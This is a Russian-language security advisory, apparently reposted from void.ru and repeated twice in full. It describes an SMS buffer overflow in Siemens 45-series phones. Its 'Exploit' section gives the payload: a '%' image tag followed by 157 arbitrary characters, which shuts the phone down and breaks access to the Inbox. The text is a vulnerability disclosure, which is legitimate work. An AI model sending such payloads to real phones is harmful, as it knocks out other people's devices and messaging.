"В телефонах Siemens серии 45, мною была найдена еще одна уязвимость, и в этот раз она по
моему мнению более опасна. При получение данной sms, телефон моментально отключается
с каким-то непонятным звуком. Когда вы включаете телефон, с виду он работает нормально,
но теперь зайти в Messages->Inbox вам не удастся. Все это происходит из за переполнения
буфера в телефоне.
Как Известно для вставки в сообщение графической картинки используется такая конструкция:
"%IMG_NAME", так вот если вместо IMG_NAME вставить 157 любых символов, то при получение
абонентом такого сообщения, произойдут вышеописанные действия.
##Exploit##
"%..........
............
............
............
............
............
............
............
............
............
............
............
............
..."
or
"%[157 symbols of any dust"
##Note##
--> Вы не сможете отправить данное сообщение со своего телефона siemens, как только
попытаетесь передать сообщение телефон выключиться.
--> Скорей всего, данная уязвимость работает и на других телефонах siemens, проверить не было
возможности, проверялось все на телефонах 45 серии.
##Solution##
Решение остается только одно, ждать пока разработчики выпустят новую версию прошивки, и
тогда только закачать ее в телефон."
//http://www.void.ru
yaskov2006
"В телефонах Siemens серии 45, мною была найдена еще одна уязвимость, и в этот раз она помоему мнению более опасна. При получение данной sms, телефон моментально отключается
с каким-то непонятным звуком. Когда вы включаете телефон, с виду он работает нормально,
но теперь зайти в Messages->Inbox вам не удастся. Все это происходит из за переполнения
буфера в телефоне.
Как Известно для вставки в сообщение графической картинки используется такая конструкция:
"%IMG_NAME", так вот если вместо IMG_NAME вставить 157 любых символов, то при получение
абонентом такого сообщения, произойдут вышеописанные действия.
##Exploit##
"%..........
............
............
............
............
............
............
............
............
............
............
............
............
..."
or
"%[157 symbols of any dust"
##Note##
--> Вы не сможете отправить данное сообщение со своего телефона siemens, как только
попытаетесь передать сообщение телефон выключиться.
--> Скорей всего, данная уязвимость работает и на других телефонах siemens, проверить не было
возможности, проверялось все на телефонах 45 серии.
##Solution##
Решение остается только одно, ждать пока разработчики выпустят новую версию прошивки, и
тогда только закачать ее в телефон."
//http://www.void.ru